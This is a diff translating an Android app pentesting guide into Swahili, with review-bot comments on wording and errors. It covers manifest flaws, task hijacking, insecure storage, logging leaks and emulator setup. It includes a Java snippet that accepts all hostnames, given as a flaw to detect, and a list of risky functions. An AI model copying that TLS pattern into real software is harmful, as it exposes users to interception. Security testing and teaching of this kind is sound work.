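# Smali paragraph carries three typos from the source: "decompile and APK" -> "an APK", "are going to
# presented" -> "going to be presented", "keep always in mid" -> "in mind". "Chomoa APK" (pull out/unplug)
# for "Extract APK" reads oddly; "Toa APK kutoka kwenye kifaa" is the usual wording.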
@ -49,7 +49,7 @@ java -jar ../APKEditor.jar m -i splits/ -o merged.apk
# after merging, you will need to align and sign the apk, personally, I like to use the uberapksigner
java -jar uber-apk-signer.jar -a merged.apk --allowResign -o merged_signed
```
## Masomo ya Kesi & Vulnerabilities
## Masomo ya Kesi & Udhaifu
{{#ref}}
@ -61,41 +61,41 @@ java -jar uber-apk-signer.jar -a merged.apk --allowResign -o merged_signed
../../linux-hardening/privilege-escalation/android-rooting-frameworks-manager-auth-bypass-syscall-hook.md
{{#endref}}
## Static Analysis
## Uchambuzi wa Statiki
Kwanza kabisa, kwa kuchambua APK unapaswa **take a look to the to the Java code** using a decompiler.\
Please, [**read here to find information about different available decompilers**](apk-decompilers.md).
Kwanza kabisa, kwa kuchambua APK unapaswa **kutazama Java code** kwa kutumia decompiler.\
Tafadhali, [**soma hapa kupata taarifa kuhusu decompilers tofauti zilizopo**](apk-decompilers.md).
### Kutafuta Taarifa Zinazovutia
Kwa kuangalia tu **strings** za APK unaweza kutafuta **passwords**, **URLs** ([https://github.com/ndelphit/apkurlgrep](https://github.com/ndelphit/apkurlgrep)), **api** keys, **encryption**, **bluetooth uuids**, **tokens** na chochote kinachovutia... angalia hata kwa code execution **backdoors** au authentication backdoors (hardcoded admin credentials to the app).
Kwa kuangalia tu **strings** za APK unaweza kutafuta **passwords**, **URLs** ([https://github.com/ndelphit/apkurlgrep](https://github.com/ndelphit/apkurlgrep)), **api** keys, **encryption**, **bluetooth uuids**, **tokens** na chochote kinachovutia... hata tazama kwa ajili ya code execution **backdoors** au authentication backdoors (hardcoded admin credentials kwa app).
**Firebase**
Lipa umakini maalum kwa **firebase URLs** na angalia kama zimesanidiwa vibaya. [More information about whats is FIrebase and how to exploit it here.](../../network-services-pentesting/pentesting-web/buckets/firebase-database.md)
Lipa makini kwa **firebase URLs** na angalia kama imewekwa vibaya. [Taarifa zaidi kuhusu ni nini Firebase na jinsi ya exploit hapa.](../../network-services-pentesting/pentesting-web/buckets/firebase-database.md)
### Basic understanding of the application - Manifest.xml, strings.xml
### Uelewa wa msingi wa application - Manifest.xml, strings.xml
Uchunguzi wa faili za programu _Manifest.xml_ na _strings.xml_ unaweza kufichua potential security vulnerabilities. Faili hizi zinaweza kupatikana ukitumia decompilers au kwa kubadilisha extension ya faili ya APK kuwa .zip na kisha kuzifungua.
Uchunguzi wa faili za programu _Manifest.xml_ na **_strings.xml_** unaweza kufumbua udhaifu wa usalama. Faili hizi zinaweza kupatikana kwa kutumia decompilers au kwa kubadilisha extension ya faili APK kuwa .zip kisha kuizipua.
Vulnerabilities zilizobainika kutoka Manifest.xml ni pamoja na:
**Udahifu** unaotambulika kutoka **Manifest.xml** ni pamoja na:
- **Debuggable Applications**: Applications zilizowekwa kama debuggable (`debuggable="true"`) katika faili ya _Manifest.xml_ zina hatari kwa kuwa zinaruhusu connections ambazo zinaweza kusababisha exploitation. Kwa ufahamu zaidi juu ya jinsi ya ku-exploit debuggable applications, rejea tutorial kuhusu kupata na ku-exploit debuggable applications kwenye kifaa.
- **Backup Settings**: Kigezo `android:allowBackup="false"` kinapaswa kuwekwa wazi kwa applications zinazoendesha taarifa nyeti ili kuzuia unauthorized data backups kupitia adb, hasa wakati usb debugging iko enabled.
- **Network Security**: Custom network security configurations (`android:networkSecurityConfig="@xml/network_security_config"`) katika _res/xml/_ zinaweza kubainisha maelezo ya usalama kama certificate pins na mipangilio ya HTTP traffic. Mfano ni kuruhusu HTTP traffic kwa domains maalum.
- **Exported Activities and Services**: Kutambua exported activities na services katika manifest kunaweza kuonyesha components ambazo zinaweza kutumika vibaya. Uchambuzi zaidi wakati wa dynamic testing unaweza kufichua jinsi ya ku-exploit components hizi.
- **Content Providers and FileProviders**: Content providers zilizo wazi zinaweza kuruhusu access au modification ya data bila idhini. Sanidiwa nzuri ya FileProviders inapaswa pia kuchunguzwa.
- **Broadcast Receivers and URL Schemes**: Components hizi zinaweza kutumika kwa exploitation, ukizingatia jinsi URL schemes zinavyosimamiwa kwa matatizo ya input.
- **SDK Versions**: Atributi `minSdkVersion`, `targetSDKVersion`, na `maxSdkVersion` zinaonyesha toleo la Android linaloungwa mkono, zikibainisha umuhimu wa kuto-support matoleo ya zamani na yalio na vulnerabilities kwa sababu za usalama.
- **Debuggable Applications**: Applications zilizowekwa kama debuggable (`debuggable="true"`) katika faili _Manifest.xml_ zina hatari kwa kuwa zinaruhusu connections ambazo zinaweza kusababisha exploit. Kwa ufahamu zaidi juu ya jinsi ya exploit debuggable applications, rejea tutorial juu ya kupata na ku-exploit debuggable applications kwenye kifaa.
- **Backup Settings**: `android:allowBackup="false"` inapaswa kuwekwa wazi kwa applications zinazosimamia taarifa nyeti ili kuzuia backups zisizoidhinishwa za data kupitia adb, hasa wakati usb debugging imewezeshwa.
- **Network Security**: Mipangilio maalumu ya network security (`android:networkSecurityConfig="@xml/network_security_config"`) katika _res/xml/_ inaweza kubainisha maelezo ya usalama kama certificate pins na mipangilio ya HTTP traffic. Mfano ni kuruhusu HTTP traffic kwa domains maalum.
- **Exported Activities and Services**: Kutambua exported activities na services katika manifest kunaweza kuonyesha components zinazoweza kutumiwa vibaya. Uchambuzi zaidi wakati wa testing ya dynamic unaweza kufichua jinsi ya exploit components hizi.
- **Content Providers and FileProviders**: Content providers zilizofunuliwa zinaweza kuruhusu access au modification ya data bila idhini. Usanidi wa FileProviders pia unapaswa kuchunguzwa.
- **Broadcast Receivers and URL Schemes**: Components hizi zinaweza kutumika kwa exploitation, hasa kuzingatia jinsi URL schemes zinavyosimamiwa kwa ajili ya input vulnerabilities.
- **SDK Versions**: `minSdkVersion`, `targetSDKVersion`, na `maxSdkVersion` zinaonyesha toleo za Android zinazotumika, zikionyesha umuhimu wa kuto-support outdated, vulnerable Android versions kwa sababu za usalama.
Kutoka kwenye faili ya **strings.xml**, taarifa nyeti kama API keys, custom schemas, na maelezo mengine ya developer zinaweza kugunduliwa, ikisisitiza umuhimu wa kupitia kwa uangalifu rasilimali hizi.
Kutoka kwenye faili **strings.xml**, taarifa nyeti kama API keys, custom schemas, na maelezo mengine ya developer yanaweza kupatikana, ikisisitiza umuhimu wa kupitia kwa uangalifu rasilimali hizi.
### Tapjacking
**Tapjacking** ni shambulio ambapo **malicious application** inaanzishwa na **positions itself on top of a victim application**. Mara inapoifunika kwa mtazamo app ya mhusika, user interface yake imeundwa kwa njia ya kumdanganya mtumiaji aingilie nayo, wakati inapotumia ile interaction kumtumia app ya mhusika.\
Kwa ufanisi, inamficha mtumiaji kuona kwamba kweli anafanya vitendo kwenye app ya mhusika.
**Tapjacking** ni shambulio ambapo **malicious application** inaanzishwa na kujipanga juu ya application ya mwathiriwa. Mara inapoficha kimaso app ya mwathiriwa, interface yake ya mtumiaji imeundwa kwa njia ya kudanganya mtumiaji kuingiliana nayo, huku ikiendelea kupitisha interaction kwa app ya mwathiriwa.\
Kwa ufanisi, inamtia doa mtumiaji kujua kuwa kwa kweli anafanya vitendo kwenye app ya mwathiriwa.
Pata taarifa zaidi katika:
Find more information in:
{{#ref}}
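Review bot: `targetSDKVersion` (in both variants of the SDK Versions bullet) is not the manifest attribute's spelling; `<uses-sdk>` takes `android:minSdkVersion`, `android:targetSdkVersion` and `android:maxSdkVersion`, and a tester grepping the manifest for the capitalised form will miss it. The Backup Settings bullet could add that on Android 12+ `adb backup` no longer exports the data of apps targeting API 31 or higher unless the app is debuggable, so `android:allowBackup` mainly governs cloud and device-to-device backup on current devices and the adb check only matters for older targets. Typos: "**Udahifu**" should be "Udhaifu", and "whats is FIrebase" in the Firebase paragraph should be "what is Firebase" if that variant is kept. In the Tapjacking paragraph, "inamtia doa mtumiaji kujua" (stains the user) is not what the English says; "inamzuia mtumiaji kugundua kwamba" (prevents the user from realising that) is the intended sense.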
@ -104,82 +104,82 @@ tapjacking.md
### Task Hijacking
An **activity** yenye **`launchMode`** imewekwa kwa **`singleTask` without any `taskAffinity`** iliyotajwa inaweza kuwa nyeti kwa task Hijacking. Hii ina maana kwamba, **application** inaweza kusakinishwa na ikiwa itaanzishwa kabla ya application halisi inaweza **hijack the task of the real application** (hivyo mtumiaji atakuwa akiingiliana na **malicious application thinking he is using the real one**).
Activity yenye `launchMode` imewekwa `singleTask` bila `taskAffinity` yoyote imeelezwa kuwa inakabiliwa na task Hijacking. Hii inamaanisha, that application inaweza kusanikishwa na ikiwa itaanzishwa kabla ya application halisi inaweza hijack task ya application halisi (kwa hivyo mtumiaji ataingiliana na **malicious application** akidhani anatumia ile halisi).
Taarifa zaidi katika:
More info in:
{{#ref}}
android-task-hijacking.md
{{#endref}}
### Insecure data storage
### Uhifadhi wa data usio salama
**Internal Storage**
Katika Android, files **stored** katika **internal** storage zimeundwa kupatikana tu na **app** iliyozitengeneza. Kipimo hiki cha usalama kinatekelezwa na operating system ya Android na kawaida kinafaa kwa mahitaji ya usalama ya applications nyingi. Hata hivyo, developers baadhi ya wakati hutumia modes kama `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` kuruhusu files kushirikiwa kati ya applications tofauti. Modes hizi hazizuizi access kwa files hizi na applications nyingine, zikiwemo zile zinazoweza kuwa malicious.
Kwenye Android, files zilizohifadhiwa kwenye internal storage zimedesignwa kupatikana pekee na app iliyozitengeneza. Kipimo hiki cha usalama kinafanywa na mfumo wa uendeshaji wa Android na kwa ujumla kinatosha kwa mahitaji ya usalama ya applications nyingi. Hata hivyo, developers wakati mwingine hutumia modes kama `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` kuruhusu files kushirikiwa kati ya applications tofauti. Modes hizi hazizuizi access kwa files hizo na applications nyingine, ikiwa ni pamoja na zile zinazoweza kuwa malicious.
1. **Static Analysis:**
- **Ensure** kwamba matumizi ya `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` yamechunguzwa kwa umakini. Modes hizi zinaweza ku-expose files kwa access isiyotarajiwa au isiyoidhinishwa.
- **Hakikisha** kuwa matumizi ya `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` yanachunguzwa kwa makini. Modes hizi **zinaweza kufunua** files kwa access isiyokusudiwa au isiyoidhinishwa.
2. **Dynamic Analysis:**
- **Verify** permissions zilizowekwa kwenye files zilizotengenezwa na app. Hasa, **check** kama kuna files zilizowekwa kuwa readable au writable worldwide. Hii inaweza kuwa hatari kubwa kwa usalama, kwani itaruhusu **any application** iliyosakinishwa kwenye kifaa, bila kujali asili au nia yake, ku-read au ku-modify files hizi.
- **Thibitisha** permissions zilizo kwenye files zilizotengenezwa na app. Haswa, **angalia** kama kuna files zilizowekwa kuwa readable au writable kwa wote. Hii inaweza kuwa hatari kubwa ya usalama, kwani itaruhusu **application yoyote** iliyosanikishwa kwenye kifaa, bila kujali asili au nia yake, kusoma au kubadilisha files hizi.
**External Storage**
Unaposhughulikia files kwenye external storage, kama SD Cards, tahadhari fulani zinapaswa kuchukuliwa:
Unaposhughulika na files kwenye external storage, kama SD Cards, tahadhari fulani zinapaswa kuchukuliwa:
1. **Accessibility**:
- Files kwenye external storage ni globally readable na writable. Hii ina maana application au mtumiaji yeyote anaweza kuweza kupata files hizi.
- Files kwenye external storage ni **globally readable and writable**. Hii inamaanisha application yoyote au mtumiaji anaweza kufikia files hizi.
2. **Security Concerns**:
- Kutokana na urahisi wa access, inapendekezwa kutohifadhi taarifa nyeti kwenye external storage.
- External storage inaweza kuondolewa au kupatikana na application yoyote, ikifanya kuwa isiyo salama.
- Kwa kuzingatia urahisi wa upatikanaji, inashauriwa **kutoweka taarifa nyeti** kwenye external storage.
- External storage inaweza kuondolewa au kufikiwa na application yoyote, ikifanya isiwe na usalama wa kutosha.
3. **Handling Data from External Storage**:
- Daima fanya input validation kwenye data inayorekebishwa kutoka external storage. Hii ni muhimu kwa sababu data inatoka kwenye chanzo kisichoaminika.
- Kuhifadhi executables au class files kwenye external storage kwa ajili ya dynamic loading haipendekezwi.
- Ikiwa application yako lazima irejelee executable files kutoka external storage, hakikisha files hizi zimesigned na cryptographically verified kabla ya kuzopakiwa kwa dynamic loading. Hatua hii ni muhimu kwa kudumisha integrity ya usalama wa application yako.
- Daima **fanya input validation** kwa data inayopatikana kutoka external storage. Hii ni muhimu kwa sababu data inatoka kwa chanzo kisichotegemewa.
- Kuingiza executables au class files kwenye external storage kwa ajili ya dynamic loading haipendekeziwi.
- Ikiwa application yako lazima ichukue executable files kutoka external storage, hakikisha files hizi zinasainiwa na kuthibitishwa kwa cryptography kabla ya kuzindua kwa dynamically. Hatua hii ni muhimu kwa kudumisha uadilifu wa usalama wa application yako.
External storage inaweza kupatikana katika `/storage/emulated/0` , `/sdcard` , `/mnt/sdcard`
> [!TIP]
> Kuanzia Android 4.4 (**API 17**), SD card ina muundo wa directories unaopunguza access kutoka app hadi directory ambayo ni maalum kwa app hiyo. Hii inazuia malicious application kupata read au write access kwa files za app nyingine.
> Kuanzia Android 4.4 (**API 17**), SD card ina muundo wa directory ambao unazuia access kutoka app hadi directory ambayo ni maalum kwa app hiyo. Hii inazuia malicious application kupata read au write access kwa files za app nyingine.
**Sensitive data stored in clear-text**
**Taarifa nyeti zilizohifadhiwa kwa clear-text**
- **Shared preferences**: Android inamruhusu kila application kuhifadhi kwa urahisi xml files katika path `/data/data/<packagename>/shared_prefs/` na wakati mwingine inawezekana kupata taarifa nyeti katika clear-text katika folder hiyo.
- **Databases**: Android inamruhusu kila application kuhifadhi kwa urahisi sqlite databases katika path `/data/data/<packagename>/databases/` na wakati mwingine inawezekana kupata taarifa nyeti katika clear-text katika folder hiyo.
- **Shared preferences**: Android inaruhusu kila application kuweka kwa urahisi xml files katika njia `/data/data/<packagename>/shared_prefs/` na wakati mwingine inawezekana kupata taarifa nyeti kwa clear-text katika folda hiyo.
- **Databases**: Android inaruhusu kila application kuhifadhi sqlite databases katika njia `/data/data/<packagename>/databases/` na wakati mwingine inawezekana kupata taarifa nyeti kwa clear-text katika folda hiyo.
### Broken TLS
**Accept All Certificates**
Kwa sababu fulani wakati mwingine developers wanakubali certificates zote hata kama kwa mfano hostname haifananai na mistari ya code kama ifuatayo:
Kwa sababu fulani wakati mwingine developers hukubali certificates zote hata kama kwa mfano hostname haifai na mistari ya code kama ifuatayo:
```java
SSLSocketFactory sf = new cc(trustStore);
sf.setHostnameVerifier(SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER);
```
Njia nzuri ya kujaribu hili ni kujaribu capture trafiki kwa kutumia proxy kama Burp bila kuidhinisha Burp CA ndani ya kifaa. Pia, unaweza kutengeneza kwa Burp cheti kwa hostname tofauti na kukitumia.
A good way to test this is to try to capture the traffic using some proxy like Burp without authorising Burp CA inside the device. Also, you can generate with Burp a certificate for a different hostname and use it.
### Broken Cryptography
**Mchakato duni wa Usimamizi wa Vifunguo**
**Mchakato duni wa Usimamizi wa Funguo**
Baadhi ya developers huhifadhi data nyeti kwenye local storage na kui-encrypt kwa key iliyowekwa/takikana kwenye code. Hili halipaswi kufanywa kwa kuwa reversing inaweza kumruhusu attackers kutoa taarifa za siri.
Baadhi ya developers huhifadhi data nyeti kwenye local storage na kuizificha kwa key iliyowekwa/kutabirika ndani ya code. Hii haipaswi kufanywa kwani reverse engineering inaweza kumruhusu attacker kutoa taarifa za siri.
**Use of Insecure and/or Deprecated Algorithms**
**Matumizi ya Algorithms Yasiyo Salama na/au Zilizokataliwa**
Developers hawapaswi kutumia **deprecated algorithms** kufanya uthibitisho (**checks**), **store** au **send** data. Baadhi ya algorithms hizi ni: RC4, MD4, MD5, SHA1... Ikiwa **hashes** zinatumiwa kuhifadhi passwords kwa mfano, zinasuasua dhidi ya brute-force na zinapaswa kutumika pamoja na salt.
Developers hawapaswi kutumia **deprecated algorithms** kufanya ukaguzi wa **authorisation checks**, **kuhifadhi** au **kutuma** data. Baadhi ya algorithms ni: RC4, MD4, MD5, SHA1... Ikiwa **hashes** zimetumika kuhifadhi nywila kwa mfano, inapaswa kutumika hashes ambazo zinastahimili brute-force kwa kutumia salt.
### Ukaguzi mwingine
### Other checks
- Inashauriwa **obfuscate the APK** ili kufanya kazi ya reverse engineer kuwa ngumu kwa attackers.
- Ikiwa app ni nyeti (kama apps za benki), inapaswa kufanya ukaguzi wake ili kuona kama mobile ime-rooted na kuchukua hatua ipasavyo.
- Ikiwa app ni nyeti (kama apps za benki), inapaswa kuchunguza kama **emulator** inatumika.
- Ikiwa app ni nyeti (kama apps za benki), inapaswa **check it's own integrity before executing** ili kuona kama imebadilishwa.
- Tumia [**APKiD**](https://github.com/rednaga/APKiD) kuangalia compiler/packer/obfuscator gani ilitumika kujenga APK
- It's recommended to **obfuscate the APK** to difficult the reverse engineer labour to attackers.
- If the app is sensitive (like bank apps), it should perform it's **own checks to see if the mobile is rooted** and act in consequence.
- If the app is sensitive (like bank apps), it should check if an **emulator** is being used.
- If the app is sensitive (like bank apps), it should **check it's own integrity before executing** it to check if it was modified.
- Use [**APKiD**](https://github.com/rednaga/APKiD) to check which compiler/packer/obfuscator was used to build the APK
### React Native Application
Soma ukurasa ufuatao ili ujifunze jinsi ya kufikia kwa urahisi javascript code ya React applications:
Read the following page to learn how to easily access javascript code of React applications:
{{#ref}}
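Review bot: the Task Hijacking paragraph leaks the English word `that` mid-sentence (`Hii inamaanisha, that application inaweza kusanikishwa`) and misspells `kusakinishwa`, which the line above it spells correctly. Further down, `zimedesignwa` in the Internal Storage paragraph is not a word (`zimeundwa`, as in the neighbouring line), `hostname haifai` under Accept All Certificates means "the hostname is unsuitable" rather than "does not match" (`haifanani`; the adjacent `haifananai` is the same word misspelled), and `kuizificha kwa key` in Broken Cryptography says "hide it" where "encrypt it" is meant (`kuisimba`). Both versions of the TIP also keep `Android 4.4 (**API 17**)`; Android 4.4 is API level 19, so that is an upstream error worth fixing in the source before re-translating.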
@ -188,7 +188,7 @@ react-native-application.md
### Xamarin Applications
Soma ukurasa ufuatao ili ujifunze jinsi ya kufikia kwa urahisi C# code ya xamarin applications:
Read the following page to learn how to easily access C# code of a xamarin applications:
{{#ref}}
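Review bot: `C# code of a xamarin applications` mixes a singular article with a plural noun; the Swahili line beside it (`C# code ya xamarin applications`) is fine, so only the English form needs `a xamarin application`.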
@ -197,17 +197,17 @@ Soma ukurasa ufuatao ili ujifunze jinsi ya kufikia kwa urahisi C# code ya xamari
### Superpacked Applications
Kulingana na hii [**blog post**](https://clearbluejar.github.io/posts/desuperpacking-meta-superpacked-apks-with-github-actions/) superpacked ni Meta algorithm inayocompress content ya application ndani ya faili moja. Blogu inazungumzia uwezekano wa kuunda app inayofungua aina hizi za apps... na njia ya haraka zaidi inayohusisha kuendesha application na kukusanya faili zilizofunguliwa kutoka filesystem.
According to this [**blog post**](https://clearbluejar.github.io/posts/desuperpacking-meta-superpacked-apks-with-github-actions/) superpacked is a Meta algorithm that compress the content of an application into a single file. The blog talks about the possibility of creating an app that decompress these kind of apps... and a faster way which involves to **execute the application and gather the decompressed files from the filesystem.**
### Automated Static Code Analysis
Tool [**mariana-trench**](https://github.com/facebook/mariana-trench) inaweza kupata **vulnerabilities** kwa **scanning** **code** ya application. Tool hii ina mfululizo wa **known sources** (ambazo zinaonyesha sehemu ambapo **input** inadhibitiwa na user), **sinks** (zinazoonyesha sehemu hatari ambapo input ya mharifu inaweza kusababisha uharibifu) na **rules**. Rules hizi zinaelezea **combination** ya **sources-sinks** inayosema kuna vulnerability.
The tool [**mariana-trench**](https://github.com/facebook/mariana-trench) is capable of finding **vulnerabilities** by **scanning** the **code** of the application. This tool contains a series of **known sources** (that indicates to the tool the **places** where the **input** is **controlled by the user**), **sinks** (which indicates to the tool **dangerous** **places** where malicious user input could cause damages) and **rules**. These rules indicates the **combination** of **sources-sinks** that indicates a vulnerability.
Kwa maarifa haya, **mariana-trench will review the code and find possible vulnerabilities on it**.
With this knowledge, **mariana-trench will review the code and find possible vulnerabilities on it**.
### Secrets leaked
Application inaweza kuwa na secrets (API keys, passwords, hidden urls, subdomains...) ndani yake ambazo unaweza kugundua. Unaweza kutumia tool kama [https://github.com/dwisiswant0/apkleaks](https://github.com/dwisiswant0/apkleaks)
An application may contain secrets (API keys, passwords, hidden urls, subdomains...) inside of it that you might be able to discover. You could us a tool such as [https://github.com/dwisiswant0/apkleaks](https://github.com/dwisiswant0/apkleaks)
### Bypass Biometric Authentication
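Review bot: `You could us a tool such as` in the Secrets leaked paragraph has a typo (`us` for `use`). In the Superpacked paragraph, `kukusanya faili zilizofunguliwa` renders "decompressed files" as "opened files"; this page otherwise keeps the technical verb untranslated (`decompress`), which would be clearer here too. In the mariana-trench paragraph, `input ya mharifu` ("a criminal's input") is stronger than the source's "malicious user input"; `input ya mtumiaji mwenye nia mbaya` matches it.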
@ -216,14 +216,14 @@ Application inaweza kuwa na secrets (API keys, passwords, hidden urls, subdomain
bypass-biometric-authentication-android.md
{{#endref}}
### Vifunction vingine vinavyovutia
### Other interesting functions
- **Code execution**: `Runtime.exec(), ProcessBuilder(), native code:system()`
- **Send SMSs**: `sendTextMessage, sendMultipartTestMessage`
- **Native functions** declared as `native`: `public native, System.loadLibrary, System.load`
- [Read this to learn **how to reverse native functions**](reversing-native-libraries.md)
### **Mbinu nyingine**
### **Other tricks**
{{#ref}}
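Review bot: `sendMultipartTestMessage` in the Send SMSs bullet is not an Android API; the SmsManager method is `sendMultipartTextMessage`, and the typo is carried unchanged through this hunk. The heading `### Vifunction vingine vinavyovutia` glues a Swahili noun-class prefix onto an English word; `### Functions nyingine za kuvutia`, or the untranslated heading kept as elsewhere on the page, reads better.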
@ -236,54 +236,54 @@ content-protocol.md
## Dynamic Analysis
> Kwanza kabisa, unahitaji mazingira ambapo unaweza kuinstall application na mazingira yote (Burp CA cert, Drozer and Frida hasa). Kwa hivyo, kifaa kilicho-rooted (emulated au la) kinapendekezwa sana.
> First of all, you need an environment where you can install the application and all the environment (Burp CA cert, Drozer and Frida mainly). Therefore, a rooted device (emulated or not) is extremely recommended.
### Online Dynamic analysis
Unaweza kuunda akaunti ya **free account** kwenye: [https://appetize.io/](https://appetize.io/). Jukwaa hili linakuwezesha **upload** na **execute** APKs, hivyo ni muhimu kuona jinsi apk inavyo behave.
You can create a **free account** in: [https://appetize.io/](https://appetize.io). This platform allows you to **upload** and **execute** APKs, so it is useful to see how an apk is behaving.
Unaweza hata **kuona logs za application yako** kwenye wavuti na kuungana kupitia **adb**.
You can even **see the logs of your application** in the web and connect through **adb**.
![](<../../images/image (831).png>)
Shukrani kwa muunganisho wa ADB unaweza kutumia **Drozer** na **Frida** ndani ya emulators.
Thanks to the ADB connection you can use **Drozer** and **Frida** inside the emulators.
### Local Dynamic Analysis
#### Using an emulator
- [**Android Studio**](https://developer.android.com/studio) (Unaweza kuunda **x86** na **arm** devices, na kulingana na [**this** ](https://android-developers.googleblog.com/2020/03/run-arm-apps-on-android-emulator.html)**latest x86** versions **support ARM libraries** bila kuhitaji emulator ya arm ya polepole).
- Jifunze kuisanidi kwenye ukurasa huu:
- [**Android Studio**](https://developer.android.com/studio) (You can create **x86** and **arm** devices, and according to [**this** ](https://android-developers.googleblog.com/2020/03/run-arm-apps-on-android-emulator.html)**latest x86** versions **support ARM libraries** without needing an slow arm emulator).
- Learn to set it up in this page:
{{#ref}}
avd-android-virtual-device.md
{{#endref}}
- [**Genymotion**](https://www.genymotion.com/fun-zone/) **(Toleo la bure:** Personal Edition, unahitaji kuunda account. _Inashauriwa kupakua toleo **WITH**_ _**VirtualBox** ili kuepuka makosa yanayoweza kutokea._)
- [**Nox**](https://es.bignox.com) (Free, lakini haijiunga na Frida au Drozer).
- [**Genymotion**](https://www.genymotion.com/fun-zone/) **(Free version:** Personal Edition, you need to create an account. _It's recommend to **download** the version **WITH**_ _**VirtualBox** to avoid potential errors._)
- [**Nox**](https://es.bignox.com) (Free, but it doesn't support Frida or Drozer).
> [!TIP]
> Unapotengeneza emulator mpya kwenye platform yoyote kumbuka kuwa skrini kubwa inafanya emulator kukimbia polepole. Hivyo chagua skrini ndogo pale inapowezekana.
> When creating a new emulator on any platform remember that the bigger the screen is, the slower the emulator will run. So select small screens if possible.
Ili **install google services** (kama AppStore) katika Genymotion unahitaji kubofya kitufe kilichowekwa kwa rangi nyekundu kwenye picha ifuatayo:
To **install google services** (like AppStore) in Genymotion you need to click on the red marked button of the following image:
![](<../../images/image (277).png>)
Pia, zingatia kwamba katika **configuration of the Android VM in Genymotion** unaweza kuchagua **Bridge Network mode** (hii itakuwa muhimu ukijiunga na Android VM kutoka VM tofauti yenye tools).
Also, notice that in the **configuration of the Android VM in Genymotion** you can select **Bridge Network mode** (this will be useful if you will be connecting to the Android VM from a different VM with the tools).
#### Use a physical device
Unahitaji kuwasha chaguo za **debugging** na itakuwa nzuri ikiwa unaweza kui-**root**:
Unahitaji kuwezesha chaguo za **debugging** na itakuwa vizuri kama utaweza kuziroot:
1. **Settings**.
2. (FromAndroid 8.0) Chagua **System**.
3. Chagua **About phone**.
4. Bonyeza **Build number** mara 7.
5. Rudi nyuma na utapata **Developer options**.
2. (FromAndroid 8.0) Select **System**.
3. Select **About phone**.
4. Press **Build number** 7 times.
5. Go back and you will find the **Developer options**.
> Mara tu utakapo-install application, jambo la kwanza unalopaswa kufanya ni kuijaribu na kuchunguza inafanya nini, jinsi inavyofanya kazi na kuzoea kuitumia.\
> Ninapendekeza kufanya uchambuzi huu wa mwanzo wa dynamic ukitumia MobSF dynamic analysis + pidcat, hivyo tunaweza kujifunza jinsi application inavyofanya kazi wakati MobSF inachukua data nyingi za kuvutia ambazo unaweza kukagua baadaye.
> Once you have installed the application, the first thing you should do is to try it and investigate what does it do, how does it work and get comfortable with it.\
> I will suggest to **perform this initial dynamic analysis using MobSF dynamic analysis + pidcat**, so we will be able to **learn how the application works** while MobSF **captures** a lot of **interesting** **data** you can review later on.
Magisk/Zygisk quick notes (recommended on Pixel devices)
- Patch boot.img with the Magisk app and flash via fastboot to get systemless root
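Review bot: `itakuwa vizuri kama utaweza kuziroot` attaches the object marker for the debugging options (`zi-`) instead of the device; the neighbouring `kui-root` is correct. `(FromAndroid 8.0)` is missing a space in both the Swahili and the English step list. `Magisk/Zygisk quick notes (recommended on Pixel devices)` and its bullets are left in English although the rest of the section is Swahili, so the translation is incomplete at that point, and `an slow arm emulator` in the Android Studio bullet should be `a slow`.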
@ -291,106 +291,108 @@ Magisk/Zygisk quick notes (recommended on Pixel devices)
- Keep original boot.img to recover from OTA updates; re-patch after each OTA
- For screen mirroring, use scrcpy on the host
### Unintended Data Leakage
**Logging**
Developers wanapaswa kuwa mwangalifu kuhusu kufichua **debugging information** hadharani, kwa kuwa inaweza kusababisha data nyeti ku-leak. Tools [**pidcat**](https://github.com/JakeWharton/pidcat) na `adb logcat` zinapendekezwa kwa kusimamia application logs ili kubaini na kulinda taarifa nyeti. **Pidcat** inapendelewa kwa urahisi wake wa matumizi na kusomeka kwake.
Wdevelopers wanapaswa kuwa waangalifu kuhusu kufichua **debugging information** hadharani, kwa kuwa inaweza kusababisha data nyeti ku-leak. Vifaa kama [**pidcat**](https://github.com/JakeWharton/pidcat) na `adb logcat` zinapendekezwa kufuatilia logs za application ili kubaini na kulinda taarifa nyeti. **Pidcat** inapendekezwa kwa urahisi wake na usomaji.
> [!WARNING]
> Kumbuka kuwa tangu toleo za baadaye zaidi za Android kuliko 4.0, **applications zinaweza kufikia tu logs zao wenyewe**. Hivyo applications haiwezi kufikia logs za apps nyingine.\
> Hata hivyo, bado inashauriwa **kuto-log taarifa nyeti**.
> Note that from **later newer than Android 4.0**, **applications are only able to access their own logs**. So applications cannot access other apps logs.\
> Anyway, it's still recommended to **not log sensitive information**.
**Copy/Paste Buffer Caching**
Mfumo wa **clipboard-based** wa Android unawezesha utendakazi wa copy-paste ndani ya apps, lakini una hatari kwa kuwa **applications nyingine** zinaweza **access** clipboard, na hivyo kuweza ku-expose data nyeti. Ni muhimu kuzima kazi za copy/paste kwa sehemu za app zenye data nyeti, kama taarifa za kadi za malipo, ili kuzuia data ku-leak.
Mfumo wa Android unaotegemea **clipboard** unaruhusu utendaji wa copy-paste ndani ya apps, lakini unaweka hatari kwani **apps zingine** zinaweza **access** clipboard, na hivyo kuweza ku-expose data nyeti. Ni muhimu **kuzima** vitendo vya copy/paste kwa sehemu nyeti za app, kama maelezo ya kadi za mkopo, ili kuzuia data ku-leak.
**Crash Logs**
Kama application ina **crash** na **inahifadhi logs**, logs hizi zinaweza kumsaidia attacker, hasa pale app haiwezi kureverse-engineered. Ili kupunguza hatari hii, epuka ku-log wakati wa crash, na ikiwa logs lazima zitumwe mtandaoni, hakikisha zinatumwa kupitia channel ya SSL kwa usalama.
Kama application inakufa (crash) na **kuhifadhi logs**, logs hizi zinaweza kumsaidia attacker, hasa pale ambapo application haiwezi kureverse-engineered. Ili kupunguza hatari hii, epuka logging kwenye crash, na kama logs lazima zitumwe kwenye network, hakikisha zitatumwa kwa channel ya SSL kwa usalama.
Kama pentester, **jaribu kuangalia_logs hizi**.
Kama pentester, **try to take a look to these logs**.
**Analytics Data Sent To 3rd Parties**
Applications mara nyingi hujumuisha huduma kama Google Adsense, ambazo zinaweza kwa bahati mbaya ku-leak data nyeti kutokana na utekelezaji mbovu na developers. Ili kubaini uwezekano wa data ku-leak, inashauriwa ku-intercept trafiki ya application na kuangalia kama kuna taarifa nyeti zinazotumwa kwa huduma za third-party.
